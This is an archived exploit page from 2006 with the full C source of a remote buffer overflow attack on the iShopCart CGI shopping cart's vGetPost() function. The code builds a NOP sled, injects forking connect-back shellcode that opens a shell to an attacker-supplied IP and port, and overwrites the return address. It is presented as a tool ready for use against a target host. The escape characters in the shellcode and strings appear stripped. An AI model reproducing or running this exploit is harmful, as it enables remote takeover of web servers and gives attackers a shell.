[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : iShopCart vGetPost() Remote Buffer Overflow Exploit (cgi)
# Published : 2006-06-02
# Author : K-sPecial
# Previous Title : Redaxo CMS <= 3.2 (INCLUDE_PATH) Remote File Include Vulnerabilities
# Next Title : Igloo <= 0.1.9 (Wiki.php) Remote File Include Vulnerability
/* Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
* Name: ishopcart-cgi-bof.c (<= easy-scart6.c)
* Date: 5/25/2006
* Version:
* 1.00 (5/25/2006) - ishopcart-cgi-bof.c created
*
* Description: there is an overflow in the vGetPost() function, it does not do any size checking on the inputed data but instead
* reads until the word "Submit" is encountered, in turn overflowing pszBuf which points to a 4000 byte buffer in main(). Complete
* code execution is spawned, with the code being a connectback shell.
*
* Notes: I could not for the life of me find any connect back shellcode that forks! This code needed to fork because apache
* was killing the connect back process as soon as it connected. So, in turn, I have modified netric's callback shellcode with
* some forking shellcode to accomplish the workaround.
*
* Compile: gcc -o icb ishopcart-cgi-bof.c -std=c99
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>
#include <getopt.h>
#include <errno.h>
#include <stdlib.h>
#define PORT 80
#define CB_PORT 31337
#define IP_OFFSET 33 + 13
#define PORT_OFFSET 39 + 13 // + 13 to these for the new forking mod added to cb[]
#define OFFSET 0x41414141 // find your own damn offset, the code works 100% any fault is on yourself
void changeip(char *ip);
void changeport(char *code, int port, int offset);
void help(void);
// netric callback shellcode
char cb[] =
"x31xc0x31xdb"
"xb0x02" // movb $0x2,%al / sys_fork (2)
"xcdx80" // int $0x80
"x38xc3" // cmpl %ebx,%eax / check if child; %eax = 0x0
"x74x05" // je 0x5 / jump after the exit if we're the child
// sys_exit (1)
"x8dx43x01" // leal 0x1(%ebx),%eax / sys_exit (1) if we're the parent
"xcdx80" // int $0x80 / interrupt 80 to execute sys_exit
"x31xc9x51xb1"
"x06x51xb1x01x51xb1x02x51"
"x89xe1xb3x01xb0x66xcdx80"
"x89xc2x31xc0x31xc9x51x51"
"x68x41x42x43x44x66x68xb0"
"xefxb1x02x66x51x89xe7xb3"
"x10x53x57x52x89xe1xb3x03"
"xb0x66xcdx80x31xc9x39xc1"
"x74x06x31xc0xb0x01xcdx80"
"x31xc0xb0x3fx89xd3xcdx80"
"x31xc0xb0x3fx89xd3xb1x01"
"xcdx80x31xc0xb0x3fx89xd3"
"xb1x02xcdx80x31xc0x31xd2"
"x50x68x6ex2fx73x68x68x2f"
"x2fx62x69x89xe3x50x53x89"
"xe1xb0x0bxcdx80x31xc0xb0"
"x01xcdx80";
int main (int argc, char **argv) {
int sock;
unsigned offset = OFFSET, ipaddr, i = 0;
unsigned short port = PORT, cbport = CB_PORT;
struct sockaddr_in server;
char *host, *location, *cbip, buff[5120], opt;
host = location = cbip = 0;
while ((opt = getopt(argc, argv, "i:p:o:l:1:2:h")) != -1) {
switch(opt) {
case 'i':
host = optarg;
break;
case 'p':
sscanf(optarg, "%hu", &port);
break;
case 'o':
sscanf(optarg, "%x", &offset);
break;
case 'l':
location = optarg;
break;
case '1':
cbip = optarg;
break;
case '2':
sscanf(optarg, "%hu", &cbport);
break;
}
}
if (!(host && location && cbip)) {
puts("-!> a required argument was missingn");
help();
exit(1);
}
changeip(cbip);
changeport(cb, cbport, PORT_OFFSET);
if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("socket() error: %sn", strerror(errno));
exit(1);
}
server.sin_port = htons(port);
if ((ipaddr = inet_addr(host)) == -1) {
struct hostent *myhost;
if ((myhost = gethostbyname(host)) == 0) {
printf("-!> failed to resolve host '%s'n", host);
exit(1);
}
memcpy((char*) &server.sin_addr, myhost->h_addr, myhost->h_length);
}
else server.sin_addr.s_addr = ipaddr;
server.sin_family = AF_INET;
memset(&(server.sin_zero), 0, 8);
if (connect(sock, (struct sockaddr *) &server, sizeof(server)) != 0) {
printf("-!> connect() to '%s:%hu' failed: %sn", host, port, strerror(errno));
exit(1);
}
sprintf(buff, "GET %s?sslinvoice HTTP/1.1nHost: %snContent-Length: %unn", location, host, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"));
send(sock, buff, strlen(buff), 0);
for (0; i < 4000; i++) *(buff+i) = 0x90;
for (unsigned a = 0; a < sizeof(cb) - 1; i++, a++) *(buff+i) = *(cb+a);
for (unsigned a = 0; a < 128; i += 4, a++) memcpy(buff+i, &offset, 4);
strcpy(buff+4000+sizeof(cb)+512 - 1, "Submitn");
send(sock, buff, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"), 0);
}
void help (void) {
char *string = "ishopcart CGI shopcart buffer overflow exploit by K-sPecial (http://xzziroz.net) of .aware (http://awarenetwork.org)nLicense: GPL (5/24/2006)nn"
"-i <%s> t - specifies the vulnerable host; default 80n"
"-p [%hu] t - specifies the vulnerable host's portn"
"-l <%s> t - specifies the vulnerable CGI locationn"
"-o [%x] t - forces an explicit offsetn"
"-1 <%s> t - specifies the connect back ipn"
"-2 [%hu] t - specifies the connect back port; default 31337n"
"-h t - shows this helpn";
puts(string);
}
void changeip(char *ip) {
char *ptr;
ptr=cb+IP_OFFSET;
/* Assume Little-Endianess.... */
*((long *)ptr)=inet_addr(ip);
}
// ripped from some of snooq's code
void changeport(char *code, int port, int offset) {
char *ptr;
ptr=code+offset;
/* Assume Little-Endianess.... */
*ptr++=(char)((port>>8)&0xff);
*ptr++=(char)(port&0xff);
}
// www.Syue.com [2006-06-02]